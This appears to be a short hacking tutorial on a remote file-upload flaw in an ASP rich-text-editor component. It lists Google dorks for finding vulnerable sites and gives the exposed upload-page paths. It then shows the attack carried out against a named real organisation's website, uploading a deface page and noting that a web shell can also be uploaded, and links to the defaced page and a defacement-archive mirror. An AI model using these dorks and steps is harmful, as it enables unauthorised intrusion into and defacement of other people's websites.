Rte Remote File Upload Vulnerability

Rte Remote File Upload Vulnerability found in many sites

To find which site's are Vulnerable Use following Google dorks for find such Sites

inurl:rte/my_documents/my_files

inurl:/my_documents/my_files/

These are Exploit

• siteexample.com/rte/RTE_popup_file_atch.asp

• siteexample.com/admin/RTE_popup_file_atch.asp

Hack a a site for Example.

http://www.jrf.org.tw/newjrf/index_new.asp

Remove /index_new.asp from it and put exploit link with it like

http://www.jrf.org.tw/newjrf/rte/RTE_popup_file_atch.asp

Now you will be get admin control area where you can upload your deface page and also your shell too in some cases like this

Hacked link

http://www.jrf.org.tw/newjrf/rte/my_documents/my_files/FF1_hitcher.html

Mirror

http://www.zone-hack.com/defacements/?id=4365